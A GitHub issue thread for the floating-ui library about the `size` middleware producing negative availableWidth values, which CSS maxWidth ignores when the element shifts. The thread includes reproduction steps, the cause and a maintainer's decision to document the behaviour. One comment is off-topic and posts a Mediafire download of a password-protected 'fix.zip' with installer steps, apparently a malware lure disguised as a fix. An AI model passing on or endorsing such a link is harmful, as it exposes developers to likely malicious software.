### ISSUE TITLE
`size` placed before `shift` has inconsistent non-zero size when shifting

### ISSUE THREAD

**Issue by madoci** [floating-ui/floating-ui#3028]
**Describe the bug**

When using `size` before  `shift` and scrolling toward a side where the available size reduces (eg. to the left for a `bottom-start` placement LTR), the floating element size should reach 0 before shifting, but is instead inconsistent (and depends on the scrolling speed).

**To Reproduce**

1. Go to https://codesandbox.io/p/sandbox/floating-ui-zero-width-f62m3k
2. Scroll slowly to the far left of the container (or click on the "< Slow" button).
3. The floating element size down until its width reaches almost zero, then starts shifting.
4. Return to a middle scroll position (or click on the "Reset" button).
5. Scroll rapidly to the far left of the container (or click on the "<< Fast" button).
6. The floating element shifts while still having a large width.

**Expected behavior**

The floating element should have a width of zero when it starts shifting.

**Screenshots**

![Capture d’écran du 2024-08-28 12-11-12](https://github.com/user-attachments/assets/e5ce57ed-2042-4509-b490-a2b7c860d0cf)
![Capture d’écran du 2024-08-28 12-11-38](https://github.com/user-attachments/assets/215ae56b-60c7-490b-bacb-8ee712c02614)

**Context:**

- OS: Linux
- Browser: Chrome 127.0.6533.99
- Version: @floating-ui/dom 1.6.10

**Additional context**

This is due to the overflow being greater than the width for a moment, resulting in a negative `availableWidth` : 
https://github.com/floating-ui/floating-ui/blob/0918dddda0be8ca40e30402de5e3cb207df7f465/packages/core/src/middleware/size.ts#L75-L78

When feeding `availableWidth` directly into the CSS `maxWidth` property, the negative value is ignored and so `maxWidth` keeps its previous value.

I propose to clip the `availableWidth` and `availableHeight` to 0 if negative, as I see no interest in having negative values.
If we want to keep negative values however (as there is an obvious workaround - clipping the values in the `apply` function), I think we should update the doc to state that these values can be negative and therefore be ignored by the CSS style (and maybe change the `Usage` examples).

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by atomiks** [comment]
> I propose to clip the availableWidth and availableHeight to 0 if negative, as I see no interest in having negative values.

Could be valid indeed. I'm not sure when you'd want negative values given it's generally used as the `maxHeight` property; though the current setup is technically more flexible given the consumer can clamp it like `Math.max(0, availableHeight)` themselves if necessary. I guess to avoid breaking changes, we should simply add docs instead as you mentioned:

> I think we should update the doc to state that these values can be negative and therefore be ignored by the CSS style (and maybe change the Usage examples).

**Comment by atomiks** [comment]
https://github.com/floating-ui/floating-ui/commit/805d4077f70a0573bb33c596b7a20f513848f29f
